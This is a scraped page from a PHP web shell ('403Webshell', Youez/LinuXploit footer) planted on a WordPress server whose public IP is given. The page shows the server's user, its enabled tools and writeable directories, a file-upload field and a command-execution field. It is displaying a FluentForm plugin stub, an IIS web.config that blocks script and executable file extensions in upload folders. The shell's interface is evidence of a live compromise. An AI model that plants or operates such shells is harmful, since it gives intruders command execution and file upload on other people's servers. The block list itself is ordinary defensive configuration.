403Webshell
Server IP : 52.25.153.185  /  Your IP : 216.73.216.168
Web Server : Apache
System : Linux ip-172-26-6-158 5.10.0-45-cloud-amd64 #1 SMP Debian 5.10.259-1 (2026-07-02) x86_64
User : daemon ( 1)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /bitnami/wordpress/wp-content/plugins/fluentformpro/src/Stubs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bitnami/wordpress/wp-content/plugins/fluentformpro/src/Stubs/webconfig.stub
<?xml version="1.0" encoding="UTF-8"?>
<!-- FluentForm: IIS counterpart of the .htaccess guard. It stops server-side scripts from being
     executed out of the upload directory while leaving normal static downloads working. Uses
     Request Filtering (installed by default on IIS 7+) rather than a URL-authorization deny-all,
     which needs the URL Authorization role and 500s the whole tree when that role is absent. -->
<configuration>
    <system.webServer>
        <security>
            <requestFiltering>
                <fileExtensions allowUnlisted="true">
                    <add fileExtension=".php" allowed="false" />
                    <add fileExtension=".php3" allowed="false" />
                    <add fileExtension=".php4" allowed="false" />
                    <add fileExtension=".php5" allowed="false" />
                    <add fileExtension=".php7" allowed="false" />
                    <add fileExtension=".php8" allowed="false" />
                    <add fileExtension=".phtml" allowed="false" />
                    <add fileExtension=".phar" allowed="false" />
                    <add fileExtension=".asp" allowed="false" />
                    <add fileExtension=".aspx" allowed="false" />
                    <add fileExtension=".ashx" allowed="false" />
                    <add fileExtension=".asmx" allowed="false" />
                    <add fileExtension=".cgi" allowed="false" />
                    <add fileExtension=".pl" allowed="false" />
                    <add fileExtension=".py" allowed="false" />
                    <add fileExtension=".exe" allowed="false" />
                    <add fileExtension=".dll" allowed="false" />
                    <add fileExtension=".config" allowed="false" />
                </fileExtensions>
            </requestFiltering>
        </security>
    </system.webServer>
</configuration>

Youez - 2016 - github.com/yon3zu
LinuXploit